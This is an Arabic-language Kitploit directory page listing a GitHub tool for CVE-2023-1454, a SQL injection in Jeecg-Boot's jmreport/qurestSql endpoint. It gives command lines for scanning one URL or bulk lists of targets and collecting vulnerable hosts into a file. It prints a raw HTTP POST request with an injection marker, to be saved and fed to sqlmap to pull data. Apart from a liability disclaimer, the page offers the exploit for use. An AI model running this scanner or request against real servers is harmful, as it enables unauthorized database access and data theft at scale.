Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-1454 — CVE-2023-1454, حقن SQL في الواجهة الأمامية لـ Jeecg-Boot, كشف الدفعات CVE-2023-1454 | Kitploit
أدوات/GitHubGitHub/padbergpete47/cve-2023-1454
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubpadbergpete47/cve-2023-1454

CVE-2023-1454

CVE-2023-1454, حقن SQL في الواجهة الأمامية لـ Jeecg-Boot, كشف الدفعات CVE-2023-1454

عرض المستودع
82منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-1454

POC لفحص جماعي لثغرة حقن SQL غير مصرح بها في jmreport/qurestSql

Jeecg-Boot هي منصة تطوير سريع تعتمد على Spring Boot و Jeecg-Boot-Plus. تم اكتشاف العديد من ثغرات حقن SQL في أحدث إصدار jeecg-boot 3.5.0.

وصف

رابط الأداة الأصلية

الأداة الأصلية لديها معدل إنذار كاذب مرتفع، قمت بتعديل شرط التقييم وتحسين الكود.

استخدام الأداة

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 اختبار عنوان URL واحد

python3 CVE-2023-1454-scan.py -f url.txt فحص جماعي

بعد انتهاء الفحص، سيتم إنشاء ملف vuln.txt يحتوي على عناوين URL المعرضة للثغرة في الدليل الحالي.

POC:

EXP:

احفظ حزمة البيانات كملف txt واستخدم sqlmap للحصول على البيانات.

root@kitploit:~
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

إخلاء مسؤولية

أي عواقب أو خسائر مباشرة أو غير مباشرة ناتجة عن نشر أو استخدام المعلومات الواردة في هذه الوثيقة تقع على عاتق المستخدم وحده، ولا يتحمل المؤلف أي مسؤولية عن ذلك.

تنزيل الأداة